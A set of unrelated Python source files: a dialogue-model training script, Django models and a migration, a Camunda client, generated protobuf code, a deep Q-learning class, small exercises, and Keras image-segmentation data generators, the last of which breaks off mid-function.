parser.add_argument('--batch_size', type=int, default=64, metavar='N', help='input batch size for training (default: 64)')
parser.add_argument('--vocab_size', type=int, default=400, metavar='V')
parser.add_argument('--use_attn', type=util.str2bool, nargs='?', const=True, default=False)
parser.add_argument('--attention_type', type=str, default='bahdanau')
parser.add_argument('--use_emb', type=util.str2bool, nargs='?', const=True, default=False)
parser.add_argument('--emb_size', type=int, default=50)
parser.add_argument('--hid_size_enc', type=int, default=150)
parser.add_argument('--hid_size_dec', type=int, default=150)
parser.add_argument('--hid_size_pol', type=int, default=150)
parser.add_argument('--db_size', type=int, default=30)
parser.add_argument('--bs_size', type=int, default=94)
parser.add_argument('--cell_type', type=str, default='lstm')
parser.add_argument('--depth', type=int, default=1, help='depth of rnn')
parser.add_argument('--max_len', type=int, default=50)
parser.add_argument('--optim', type=str, default='adam')
parser.add_argument('--lr_rate', type=float, default=0.005)
parser.add_argument('--lr_decay', type=float, default=0.0)
parser.add_argument('--l2_norm', type=float, default=0.00001)
parser.add_argument('--clip', type=float, default=5.0, help='clip the gradient by norm')
parser.add_argument('--teacher_ratio', type=float, default=1.0, help='probability of using targets for learning')
parser.add_argument('--dropout', type=float, default=0.0)
parser.add_argument('--no_cuda', type=util.str2bool, nargs='?', const=True, default=True)
parser.add_argument('--seed', type=int, default=0, metavar='S', help='random seed (default: 0)')
parser.add_argument('--train_output', type=str, default='data/train_dials/', help='Training output dir path')
parser.add_argument('--max_epochs', type=int, default=15)
parser.add_argument('--early_stop_count', type=int, default=2)
parser.add_argument('--model_dir', type=str, default='model/model/')
parser.add_argument('--model_name', type=str, default='translate.ckpt')
parser.add_argument('--load_param', type=util.str2bool, nargs='?', const=True, default=False)
parser.add_argument('--epoch_load', type=int, default=0)
parser.add_argument('--mode', type=str, default='train', help='training or testing: test, train, RL')
args = parser.parse_args()
# CUDA only when available and not explicitly disabled.
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.cuda else "cpu")
def train(print_loss_total,print_act_total, print_grad_total, input_tensor, target_tensor, bs_tensor, db_tensor, name=None):
    """Run one supervised update on a batch and accumulate the running totals.

    Pads the input/target sequences, moves the belief-state and DB tensors
    to the active device, and delegates the actual step to the module-level
    ``model``. Returns the updated (loss, act-loss, grad) running totals.
    """
    # create an empty matrix with padding tokens
    input_tensor, input_lengths = util.padSequence(input_tensor)
    target_tensor, target_lengths = util.padSequence(target_tensor)
    bs_tensor = torch.tensor(bs_tensor, dtype=torch.float, device=device)
    db_tensor = torch.tensor(db_tensor, dtype=torch.float, device=device)
    loss, loss_acts, grad = model.train(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,
                                                    bs_tensor, name)
    #print(loss, loss_acts)
    print_loss_total += loss
    print_act_total += loss_acts
    print_grad_total += grad
    model.global_step += 1
    # Reset the supervised-loss accumulator for the next step.
    model.sup_loss = torch.zeros(1)
    return print_loss_total, print_act_total, print_grad_total
def trainIters(model, n_epochs=10, args=args):
    """Main training loop: train on train_dials for n_epochs, validating
    (and saving the model) after every epoch.

    Relies on the module-level ``train_dials``/``val_dials`` dicts and the
    ``train`` helper above.
    """
    prev_min_loss, early_stop_count = 1 << 30, args.early_stop_count
    start = time.time()
    for epoch in range(1, n_epochs + 1):
        print_loss_total = 0; print_grad_total = 0; print_act_total = 0  # Reset every print_every
        start_time = time.time()
        # NOTE(review): the optimizers are re-created every epoch, which
        # resets Adam's moment estimates -- presumably intentional; confirm.
        model.optimizer = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.parameters()), weight_decay=args.l2_norm)
        model.optimizer_policy = Adam(lr=args.lr_rate, params=filter(lambda x: x.requires_grad, model.policy.parameters()), weight_decay=args.l2_norm)
        dials = list(train_dials.keys())
        random.shuffle(dials)
        # Dialogues are accumulated until the batch is large enough.
        input_tensor = [];target_tensor = [];bs_tensor = [];db_tensor = []
        for name in dials:
            val_file = train_dials[name]
            model.optimizer.zero_grad()
            model.optimizer_policy.zero_grad()
            input_tensor, target_tensor, bs_tensor, db_tensor = util.loadDialogue(model, val_file, input_tensor, target_tensor, bs_tensor, db_tensor)
            if len(db_tensor) > args.batch_size:
                print_loss_total, print_act_total, print_grad_total = train(print_loss_total, print_act_total, print_grad_total, input_tensor, target_tensor, bs_tensor, db_tensor)
                input_tensor = [];target_tensor = [];bs_tensor = [];db_tensor = [];
        print_loss_avg = print_loss_total / len(train_dials)
        print_act_total_avg = print_act_total / len(train_dials)
        print_grad_avg = print_grad_total / len(train_dials)
        print('TIME:', time.time() - start_time)
        print('Time since %s (Epoch:%d %d%%) Loss: %.4f, Loss act: %.4f, Grad: %.4f' % (util.timeSince(start, epoch / n_epochs),
                                                                             epoch, epoch / n_epochs * 100, print_loss_avg, print_act_total_avg, print_grad_avg))
        # VALIDATION
        valid_loss = 0
        for name, val_file in val_dials.items():
            input_tensor = []; target_tensor = []; bs_tensor = [];db_tensor = []
            input_tensor, target_tensor, bs_tensor, db_tensor = util.loadDialogue(model, val_file, input_tensor,
                                                                                  target_tensor, bs_tensor,
                                                                                  db_tensor)
            # create an empty matrix with padding tokens
            input_tensor, input_lengths = util.padSequence(input_tensor)
            target_tensor, target_lengths = util.padSequence(target_tensor)
            bs_tensor = torch.tensor(bs_tensor, dtype=torch.float, device=device)
            db_tensor = torch.tensor(db_tensor, dtype=torch.float, device=device)
            proba, _, _ = model.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor)
            proba = proba.view(-1, model.vocab_size)  # flatten all predictions
            loss = model.gen_criterion(proba, target_tensor.view(-1))
            valid_loss += loss.item()
        valid_loss /= len(val_dials)
        print('Current Valid LOSS:', valid_loss)
        model.saveModel(epoch)
def loadDictionaries():
    """Load the four vocabulary mapping files shipped with the package."""
    base = os.path.dirname(__file__)

    def _read_json(relpath):
        # Each mapping lives in its own JSON file next to this module.
        with open(os.path.join(base, relpath), 'r') as f:
            return json.load(f)

    input_lang_index2word = _read_json('data/input_lang.index2word.json')
    input_lang_word2index = _read_json('data/input_lang.word2index.json')
    output_lang_index2word = _read_json('data/output_lang.index2word.json')
    output_lang_word2index = _read_json('data/output_lang.word2index.json')
    return input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index
if __name__ == '__main__':
    # Load vocabularies, dialogue lists, build the model, then train.
    input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index = loadDictionaries()
    # Load training file list:
    with open(os.path.join(os.path.dirname(__file__),'data/train_dials.json'), 'r') as outfile:
        train_dials = json.load(outfile)
    # Load validation file list:
    with open(os.path.join(os.path.dirname(__file__), 'data/val_dials.json'), 'r') as outfile:
        val_dials = json.load(outfile)
    model = Model(args, input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index)
    if args.load_param:
        # Resume from a previously saved checkpoint epoch.
        model.loadModel(args.epoch_load)
    trainIters(model, n_epochs=args.max_epochs, args=args)
|
from django.db import models
class Post(models.Model):
    """A simple blog post: a short title plus free-form body text."""
    title = models.CharField(max_length=100)
    content = models.TextField()
    # slug = models.SlugField()
    # class Meta:
    #     verbose_name = _("")
    #     verbose_name_plural = _("s")
    def __str__(self):
        # Human-readable representation used by the admin and the shell.
        return self.title
    # def get_absolute_url(self):
    #     return f'/{self.slug}/'
|
# Generated by Django 3.0.5 on 2020-05-19 21:16
from django.db import migrations, models
import django.db.models.deletion
import exercises.helper
import exercises.validators
class Migration(migrations.Migration):
    """Auto-generated (Django 3.0.5): tightens submission-file validation
    and makes the test-result fields non-editable."""
    dependencies = [
        ('exercises', '0012_auto_20200514_2227'),
    ]
    operations = [
        # Submissions: .py extension only, Python/plain-text MIME types,
        # size between 30 bytes and 5000 bytes.
        migrations.AlterField(
            model_name='submission',
            name='file',
            field=models.FileField(upload_to=exercises.helper.get_submission_path, validators=[exercises.validators.FileValidator(allowed_extensions=['py'], allowed_mimetypes=['text/x-python', 'text/plain'], max_size=5000, min_size=30)]),
        ),
        migrations.AlterField(
            model_name='testresult',
            name='first_error',
            field=models.TextField(blank=True, editable=False, null=True),
        ),
        migrations.AlterField(
            model_name='testresult',
            name='first_failure',
            field=models.TextField(blank=True, editable=False, null=True),
        ),
        # One test result per submission; deleted together with it.
        migrations.AlterField(
            model_name='testresult',
            name='submission',
            field=models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='test_result', to='exercises.Submission'),
        ),
    ]
|
from .api.client import ApiClient
from .api.external_task import ExternalTaskApi
class CamundaClient:
    """
    A client for communicating with a Camunda server.
    """
    def __init__(self, *args, **kwargs):
        # All arguments are forwarded unchanged to the low-level ApiClient
        # (see ApiClient for the accepted connection options).
        self.api = ApiClient(*args, **kwargs)
    @property
    def external_task(self):
        # Built on demand; each wrapper is bound to this client's ApiClient.
        return ExternalTaskApi(self.api)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Data/Logs/ActionLogEntry.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Data.Logs import CatchPokemonLogEntry_pb2 as POGOProtos_dot_Data_dot_Logs_dot_CatchPokemonLogEntry__pb2
from POGOProtos.Data.Logs import FortSearchLogEntry_pb2 as POGOProtos_dot_Data_dot_Logs_dot_FortSearchLogEntry__pb2
# NOTE: everything below is emitted by protoc from ActionLogEntry.proto.
# Do not hand-edit; regenerate from the .proto file instead.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='POGOProtos/Data/Logs/ActionLogEntry.proto',
  package='POGOProtos.Data.Logs',
  syntax='proto3',
  serialized_pb=_b('\n)POGOProtos/Data/Logs/ActionLogEntry.proto\x12\x14POGOProtos.Data.Logs\x1a/POGOProtos/Data/Logs/CatchPokemonLogEntry.proto\x1a-POGOProtos/Data/Logs/FortSearchLogEntry.proto\"\xc5\x01\n\x0e\x41\x63tionLogEntry\x12\x14\n\x0ctimestamp_ms\x18\x01 \x01(\x03\x12\r\n\x05sfida\x18\x02 \x01(\x08\x12\x43\n\rcatch_pokemon\x18\x03 \x01(\x0b\x32*.POGOProtos.Data.Logs.CatchPokemonLogEntryH\x00\x12?\n\x0b\x66ort_search\x18\x04 \x01(\x0b\x32(.POGOProtos.Data.Logs.FortSearchLogEntryH\x00\x42\x08\n\x06\x41\x63tionb\x06proto3')
  ,
  dependencies=[POGOProtos_dot_Data_dot_Logs_dot_CatchPokemonLogEntry__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Logs_dot_FortSearchLogEntry__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ACTIONLOGENTRY = _descriptor.Descriptor(
  name='ActionLogEntry',
  full_name='POGOProtos.Data.Logs.ActionLogEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='timestamp_ms', full_name='POGOProtos.Data.Logs.ActionLogEntry.timestamp_ms', index=0,
      number=1, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sfida', full_name='POGOProtos.Data.Logs.ActionLogEntry.sfida', index=1,
      number=2, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='catch_pokemon', full_name='POGOProtos.Data.Logs.ActionLogEntry.catch_pokemon', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='fort_search', full_name='POGOProtos.Data.Logs.ActionLogEntry.fort_search', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
    _descriptor.OneofDescriptor(
      name='Action', full_name='POGOProtos.Data.Logs.ActionLogEntry.Action',
      index=0, containing_type=None, fields=[]),
  ],
  serialized_start=164,
  serialized_end=361,
)
# Link the message-typed fields and wire both into the 'Action' oneof.
_ACTIONLOGENTRY.fields_by_name['catch_pokemon'].message_type = POGOProtos_dot_Data_dot_Logs_dot_CatchPokemonLogEntry__pb2._CATCHPOKEMONLOGENTRY
_ACTIONLOGENTRY.fields_by_name['fort_search'].message_type = POGOProtos_dot_Data_dot_Logs_dot_FortSearchLogEntry__pb2._FORTSEARCHLOGENTRY
_ACTIONLOGENTRY.oneofs_by_name['Action'].fields.append(
  _ACTIONLOGENTRY.fields_by_name['catch_pokemon'])
_ACTIONLOGENTRY.fields_by_name['catch_pokemon'].containing_oneof = _ACTIONLOGENTRY.oneofs_by_name['Action']
_ACTIONLOGENTRY.oneofs_by_name['Action'].fields.append(
  _ACTIONLOGENTRY.fields_by_name['fort_search'])
_ACTIONLOGENTRY.fields_by_name['fort_search'].containing_oneof = _ACTIONLOGENTRY.oneofs_by_name['Action']
DESCRIPTOR.message_types_by_name['ActionLogEntry'] = _ACTIONLOGENTRY
ActionLogEntry = _reflection.GeneratedProtocolMessageType('ActionLogEntry', (_message.Message,), dict(
  DESCRIPTOR = _ACTIONLOGENTRY,
  __module__ = 'POGOProtos.Data.Logs.ActionLogEntry_pb2'
  # @@protoc_insertion_point(class_scope:POGOProtos.Data.Logs.ActionLogEntry)
  ))
_sym_db.RegisterMessage(ActionLogEntry)
# @@protoc_insertion_point(module_scope)
|
from threading import Lock
from typing import Any
import requests
class SessionCore:
    """
    Process-wide singleton owning a single shared requests.Session.
    """
    _has_instance = None
    _lock = Lock()
    def __new__(cls: Any) -> "SessionCore":
        # Double-checked locking: the unguarded test keeps repeat calls
        # lock-free, while the re-check under the lock guarantees only one
        # thread ever constructs the instance and its session.
        if cls._has_instance is None:
            with cls._lock:
                if cls._has_instance is None:
                    instance = super(SessionCore, cls).__new__(cls)
                    cls.session = requests.Session()
                    cls._has_instance = instance
        return cls._has_instance  # type: ignore
SessionCore()
|
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn, layers
class DQL(object):
    """Deep Q-learner: an RNN encoder over token-sequence states plus an
    FNN head scoring (state, action) pairs. Python 2 / TF1 graph-mode code."""
    def __init__(self,
                 input_len,
                 nb_state_token,
                 nb_action_token):
        # input_len: fixed length of the state token sequence.
        self.input_len = input_len
        # Vocabulary sizes for state tokens and action tokens.
        self.nb_state_token = nb_state_token
        self.nb_action_token = nb_action_token
        self.built = False
    def build(self,
              cells=[64, 64],
              basic_cell=rnn.LSTMCell,
              state_emb_dim=50,
              action_emb_dim=50,
              batch_size=1,
              learning_rate=1e-4,
              clip_norm=1.,
              gamma=1.0):
        """Construct the TF graph: encoder, Q-head, Huber loss, train op,
        and the all-actions argmax used for greedy action selection."""
        # state
        single_state = tf.placeholder('int32', [1, self.input_len],
                                      name='single_state')
        batch_state = tf.placeholder('int32', [batch_size, self.input_len],
                                     name='batch_state')
        # state_embW = self.get_preset_state_emb(self.nb_state_token)
        state_embW = tf.Variable(
            tf.random_uniform([self.nb_state_token, state_emb_dim], -1.0, 1.0),
            name='state_embW')
        single_state_emb = tf.nn.embedding_lookup(state_embW, single_state)
        batch_state_emb = tf.nn.embedding_lookup(state_embW, batch_state)
        encoder = rnn.MultiRNNCell([basic_cell(c) for c in cells])
        single_encoder_outputs, _ = \
            tf.nn.dynamic_rnn(encoder, single_state_emb, dtype=tf.float32)
        batch_encoder_outputs, _ = \
            tf.nn.dynamic_rnn(encoder, batch_state_emb, dtype=tf.float32)
        # Keep only the RNN output at the last time step as the state code.
        single_last_output = single_encoder_outputs[:, -1, :]
        batch_last_output = batch_encoder_outputs[:, -1, :]
        # action
        action = tf.placeholder('int32', [batch_size], name='action')
        action_embW = tf.Variable(
            tf.random_uniform([self.nb_action_token,
                               action_emb_dim], -1.0, 1.0), name='action_embW')
        # (bs, a_emb_dim)
        action_emb = tf.nn.embedding_lookup(action_embW, action)
        # joint: concatenated (state code, action embedding) pair.
        joint = tf.concat([batch_last_output, action_emb], axis=-1)
        def decision_fnn(input, reuse):
            # Two ReLU layers then a scalar Q-value; variables shared via
            # the 'decision' scope so the all-actions branch reuses them.
            with tf.variable_scope('decision', reuse=reuse):
                x = layers.linear(input, 512, scope='d1')
                x = tf.nn.relu(x)
                x = layers.linear(x, 256, scope='d2')
                x = tf.nn.relu(x)
                x = layers.linear(x, 1, scope='qv')
                return x
        qvalue = decision_fnn(joint, reuse=False)
        # expected_qv: TD target supplied by the training loop.
        expected_qv = tf.placeholder('float32', [batch_size],
                                     name='expected_qv')
        loss = expected_qv-qvalue[:, 0]
        # Huber loss: quadratic within |error| < 1, linear outside.
        loss = tf.where(tf.abs(loss) < 1.0,
                        0.5 * tf.square(loss),
                        tf.abs(loss) - 0.5)
        loss = tf.reduce_mean(loss)
        optimizer = tf.train.AdamOptimizer(
            learning_rate=learning_rate)
        train_op = tf.contrib.slim.learning.create_train_op(
            loss, optimizer, clip_gradient_norm=clip_norm)
        # enumerate every actions: tile the single state code against the
        # whole action embedding table to score all actions at once.
        joints = tf.concat([tf.tile(single_last_output,
                                    (self.nb_action_token, 1)),
                            action_embW], axis=-1)
        qvalues = decision_fnn(joints, reuse=True)
        max_qv = tf.reduce_max(qvalues)
        max_qv_ind = tf.argmax(qvalues[:, 0])
        # calculate Q(s, a)
        self.single_state = single_state
        self.batch_state = batch_state
        self.qvalue = qvalue
        self.action = action
        # training
        self.expected_qv = expected_qv
        self.train_op = train_op
        self.loss = loss
        self.batch_size = batch_size
        self.gamma = gamma
        # finding max_{a'} Q(s', a')
        self.qvalues = qvalues
        self.max_qv = max_qv
        self.max_qv_ind = max_qv_ind
        self.built = True
    def train(self,
              env,
              continued=False,
              epsilon=0.1,
              epsilon_decay=0.99,
              epsilon_min=0.1,
              iterations=1000,
              rng=np.random,
              max_exp=200):
        """Epsilon-greedy Q-learning loop over `env` episodes with an
        experience buffer, TensorBoard reward logging and checkpointing.

        NOTE(review): episodes end when a reward r <= 0 is observed --
        presumably the env signals termination via non-positive reward;
        confirm against the environment implementation.
        """
        assert (self.built)
        with tf.Session() as sess:
            # R accumulates the episode reward for TensorBoard.
            R = tf.Variable(0.)
            R_summary = tf.summary.scalar('R', R)
            sess.run(tf.global_variables_initializer())
            train_writer = tf.summary.FileWriter('tensorboard', sess.graph)
            saver = tf.train.Saver()
            if continued:
                saver.restore(sess, 'session/sess.ckpt')
            exp = []
            global_step = tf.get_collection(tf.GraphKeys.GLOBAL_STEP)[0]
            i = begin = global_step.eval()
            for i in range(begin, begin+iterations):
                env.reset()
                sess.run(R.assign(0))
                print '[{}, {}]'.format(i, epsilon)
                while True:
                    s = env.state
                    # Epsilon-greedy action selection.
                    if rng.rand() < epsilon:
                        a = rng.choice(self.nb_action_token)
                    else:
                        a = sess.run(self.max_qv_ind,
                                     feed_dict={self.single_state: [s]})
                    r = env.play(a)
                    s_next = env.state
                    exp.append((s, a, r, s_next))
                    # print s
                    sess.run(R.assign_add(r))
                    if r <= 0:
                        break
                    # sample and update
                    batch_s = []
                    batch_a = []
                    batch_q = []
                    batch_ind = np.random.choice(len(exp),
                                                 size=(self.batch_size,))
                    for exp_ind in batch_ind:
                        s, a, r, s_next = exp[exp_ind]
                        if r > 0:
                            # Bootstrapped TD target: r + gamma * max Q(s').
                            exp_pv = sess.run(self.max_qv,
                                              feed_dict={self.single_state:
                                                         [s_next]})
                            exp_pv = r + self.gamma*exp_pv
                        else:
                            # Terminal transition: target is the reward alone.
                            exp_pv = r
                        batch_s.append(s)
                        batch_a.append(a)
                        batch_q.append(exp_pv)
                    feed_dict = {self.batch_state: batch_s,
                                 self.action: batch_a,
                                 self.expected_qv: batch_q}
                    qv, loss, _ = sess.run([self.qvalue,
                                            self.loss,
                                            self.train_op],
                                           feed_dict=feed_dict)
                    # print loss, zip(qv[:, 0], batch_q)
                epsilon = max(epsilon*epsilon_decay, epsilon_min)
                # Shrink the buffer to a random 20% of max_exp when it
                # grows past max_exp.
                if len(exp) > max_exp:
                    np.random.shuffle(exp)
                    exp = exp[:int(max_exp*0.2)]
                    print 'shuffle'
                train_writer.add_summary(R_summary.eval(), i)
                if i % 100 == 0:
                    saver.save(sess, 'session/sess.ckpt')
    def get_preset_state_emb(self, n):
        """Build a fixed (non-trainable) thermometer-style state embedding:
        row i has +1 in its first i columns and -1 elsewhere; row 0 is zero."""
        emb = np.ones((n+1, n+1), dtype='float32') * (-1)
        emb[0] = 0
        for i in range(1, n+1):
            for j in range(i):
                emb[i, j] = +1
        return tf.Variable(emb, name='state_embW', trainable=False)
if __name__ == '__main__':
    # No standalone script behaviour is defined for this module.
    pass
|
# Practice: count the spaces in a sentence two ways (both print 8).
string = "Practice Problems to Drill List Comprehension in Your Head."

# Way 1: explicit loop. Iterate the characters directly instead of the
# index-based `for i in range(len(string))` anti-pattern, and compare with
# `==` rather than the misleading `' ' in char` membership test.
count = 0
for char in string:
    if char == ' ':
        count += 1
print(count)

# Way 2: list comprehension filtering the space characters.
my_space = len([char for char in string if char == ' '])
print(my_space)
|
def hello_world():
    """Return the CI template's greeting string."""
    greeting = "Hello from Python CI Template!"
    return greeting
if __name__ == "__main__":
    # Script entry point: print the greeting.
    print(hello_world())
|
from keras.utils import Sequence
import numpy as np
import cv2
#from script.cloud_images_segmentation_utillity_script import build_masks
from script.my_util import build_masks
class DataGenerator(Sequence):
    """Keras data generator that serves image batches from an in-memory store.

    Images are looked up by file name through ``imageName_to_imageIdx_dict``
    instead of being read from disk. In ``'fit'`` mode each batch also carries
    segmentation masks decoded from the RLE strings in ``target_df``.

    Parameters
    ----------
    images : indexable collection of pre-loaded images
    imageName_to_imageIdx_dict : dict mapping image name -> index into ``images``
    dataframe : pandas.DataFrame with an ``'image'`` column naming each sample
    batch_size : int, samples per batch (trailing partial batch is dropped)
    n_channels : int, channels of the generated image tensor
    target_size : (height, width) of the generated tensors
    n_classes : int, number of mask channels in ``'fit'`` mode
    mode : ``'fit'`` (yield ``(X, Y)``) or ``'predict'`` (yield ``X`` only)
    target_df : DataFrame holding ``'EncodedPixels'`` RLE masks (``'fit'`` mode)
    shuffle : bool, reshuffle the sample order at the end of every epoch
    preprocessing : optional callable applied to each image while batching
    augmentation : optional albumentations-style callable (``image=``/``mask=``)
    seed : int or None; seeds numpy's global RNG for reproducible shuffling
    """

    def __init__(self, images, imageName_to_imageIdx_dict, dataframe, batch_size, n_channels, target_size, n_classes,
                 mode='fit', target_df=None, shuffle=True, preprocessing=None, augmentation=None, seed=0):
        self.batch_size = batch_size
        self.dataframe = dataframe
        self.mode = mode
        self.target_df = target_df
        self.target_size = target_size
        self.n_channels = n_channels
        self.n_classes = n_classes
        self.shuffle = shuffle
        self.augmentation = augmentation
        self.preprocessing = preprocessing
        self.seed = seed
        # Source resolution of the RLE masks before resizing to target_size.
        self.mask_shape = (1400, 2100)
        self.list_IDs = self.dataframe.index
        self.images = images
        self.imageName_to_imageIdx_dict = imageName_to_imageIdx_dict
        if self.seed is not None:
            np.random.seed(self.seed)
        self.on_epoch_end()

    def __len__(self):
        # Number of full batches per epoch; a trailing partial batch is dropped.
        return len(self.list_IDs) // self.batch_size

    def __getitem__(self, index):
        """Return batch ``index``: ``(X, Y)`` in 'fit' mode, ``X`` in 'predict'."""
        indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
        list_IDs_batch = [self.list_IDs[k] for k in indexes]
        X = self.__generate_X(list_IDs_batch)
        if self.mode == 'fit':
            Y = self.__generate_Y(list_IDs_batch)
            if self.augmentation:
                X, Y = self.__augment_batch(X, Y)
            return X, Y
        elif self.mode == 'predict':
            return X
        # Previously an unknown mode fell through and silently returned None.
        raise ValueError("mode must be 'fit' or 'predict', got {!r}".format(self.mode))

    def on_epoch_end(self):
        """Rebuild (and optionally shuffle) the epoch's sample order."""
        self.indexes = np.arange(len(self.list_IDs))
        if self.shuffle:
            np.random.shuffle(self.indexes)

    def __generate_X(self, list_IDs_batch):
        """Assemble the image tensor for one batch."""
        X = np.empty((self.batch_size, *self.target_size, self.n_channels))
        for i, ID in enumerate(list_IDs_batch):
            img_name = self.dataframe['image'].loc[ID]
            img = self.images[self.imageName_to_imageIdx_dict[img_name]]
            if self.preprocessing:
                img = self.preprocessing(img)
            X[i,] = img
        return X

    def __generate_Y(self, list_IDs_batch):
        """Build the mask tensor for one batch from the RLE strings in target_df."""
        Y = np.empty((self.batch_size, *self.target_size, self.n_classes), dtype=int)
        for i, ID in enumerate(list_IDs_batch):
            img_name = self.dataframe['image'].loc[ID]
            image_df = self.target_df[self.target_df['image'] == img_name]
            rles = image_df['EncodedPixels'].values
            Y[i, ] = build_masks(rles, input_shape=self.mask_shape, reshape=self.target_size)
        return Y

    def __augment_batch(self, X_batch, Y_batch):
        # Apply an independent random transform to every sample in the batch.
        for i in range(X_batch.shape[0]):
            X_batch[i, ], Y_batch[i, ] = self.__random_transform(X_batch[i, ], Y_batch[i, ])
        return X_batch, Y_batch

    def __random_transform(self, X, Y):
        # Apply the same augmentation jointly to image and mask.
        composed = self.augmentation(image=X, mask=Y)
        return composed['image'], composed['mask']
class DataGenerator2(Sequence):
    """Keras data generator serving pre-loaded images AND pre-built masks.

    Unlike ``DataGenerator`` this variant looks masks up from an in-memory
    store (``masks`` + ``imageName_to_maskIdx_dict``) instead of decoding RLE
    per batch, and supports extra batch-level augmentations, applied in this
    fixed order in ``'fit'`` mode:

    1. ``smooth_overlap_mask_v1`` (if ``smooth_overlap_mask_base`` is set)
    2. ``average_filter`` on the masks (if ``mask_avefilter_kernel`` is set)
    3. ``mixhalf`` (if ``mixhalf_p`` is set)
    4. ``mixup`` (if ``mixup_alpha`` is set)
    5. the per-sample ``augmentation`` callable
    6. ``preprocessing`` on the whole batch, only when ``preproc_before_aug``
       is False; otherwise preprocessing is applied per image while batching.

    Parameters mirror ``DataGenerator``; the additional ones are the mask
    store, ``preproc_before_aug`` and the four augmentation knobs above
    (each is skipped when left as ``None``).
    """

    def __init__(self,
                 images, imageName_to_imageIdx_dict,
                 masks, imageName_to_maskIdx_dict,
                 dataframe, batch_size, n_channels, target_size, n_classes,
                 mode='fit', shuffle=True, preprocessing=None, augmentation=None, preproc_before_aug=True, seed=0,
                 mixup_alpha=None, mixhalf_p=None, mask_avefilter_kernel=None,
                 smooth_overlap_mask_base=None):
        self.batch_size = batch_size
        self.dataframe = dataframe
        self.mode = mode
        self.target_size = target_size
        self.n_channels = n_channels
        self.n_classes = n_classes
        self.shuffle = shuffle
        self.augmentation = augmentation
        self.preprocessing = preprocessing
        self.preproc_before_aug = preproc_before_aug
        self.seed = seed
        # Source resolution of the original masks (kept for reference).
        self.mask_shape = (1400, 2100)
        self.list_IDs = self.dataframe.index
        self.images = images
        self.imageName_to_imageIdx_dict = imageName_to_imageIdx_dict
        self.masks = masks
        self.imageName_to_maskIdx_dict = imageName_to_maskIdx_dict
        self.mixup_alpha = mixup_alpha
        self.mixhalf_p = mixhalf_p
        self.mask_avefilter_kernel = mask_avefilter_kernel
        self.smooth_overlap_mask_base = smooth_overlap_mask_base
        if self.seed is not None:
            np.random.seed(self.seed)
        self.on_epoch_end()

    def __len__(self):
        # Number of full batches per epoch; a trailing partial batch is dropped.
        return len(self.list_IDs) // self.batch_size

    def __getitem__(self, index):
        """Return batch ``index``: ``(X, Y)`` in 'fit' mode, ``X`` in 'predict'."""
        indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
        list_IDs_batch = [self.list_IDs[k] for k in indexes]
        X = self.__generate_X(list_IDs_batch)
        if self.mode == 'fit':
            Y = self.__generate_Y(list_IDs_batch)
            # Batch-level augmentations, in a fixed order (see class docstring).
            if self.smooth_overlap_mask_base is not None:
                Y = smooth_overlap_mask_v1(Y, self.smooth_overlap_mask_base)
            if self.mask_avefilter_kernel is not None:
                Y = average_filter(Y, self.mask_avefilter_kernel)
            if self.mixhalf_p is not None:
                X, Y = mixhalf(X, Y, self.mixhalf_p)
            if self.mixup_alpha is not None:
                X, Y = mixup(X, Y, self.mixup_alpha)
            if self.augmentation:
                X, Y = self.__augment_batch(X, Y)
            if not self.preproc_before_aug and self.preprocessing:
                X = self.preprocessing(X)
            return X, Y
        elif self.mode == 'predict':
            if not self.preproc_before_aug and self.preprocessing:
                X = self.preprocessing(X)
            return X
        # Previously an unknown mode fell through and silently returned None.
        raise ValueError("mode must be 'fit' or 'predict', got {!r}".format(self.mode))

    def on_epoch_end(self):
        """Rebuild (and optionally shuffle) the epoch's sample order."""
        self.indexes = np.arange(len(self.list_IDs))
        if self.shuffle:
            np.random.shuffle(self.indexes)

    def __load_img(self, ID):
        """Fetch one image by dataframe ID, applying per-image preprocessing."""
        img_name = self.dataframe['image'].loc[ID]
        img = self.images[self.imageName_to_imageIdx_dict[img_name]]
        if self.preproc_before_aug and self.preprocessing:
            img = self.preprocessing(img)
        return img

    def __generate_X(self, list_IDs_batch):
        """Assemble the image tensor for one batch."""
        # Probe the first image to pick the batch dtype -- preprocessing may
        # change it (e.g. uint8 -> float32).
        probe = self.__load_img(list_IDs_batch[0])
        X = np.empty((self.batch_size, *self.target_size, self.n_channels), dtype=probe.dtype)
        for i, ID in enumerate(list_IDs_batch):
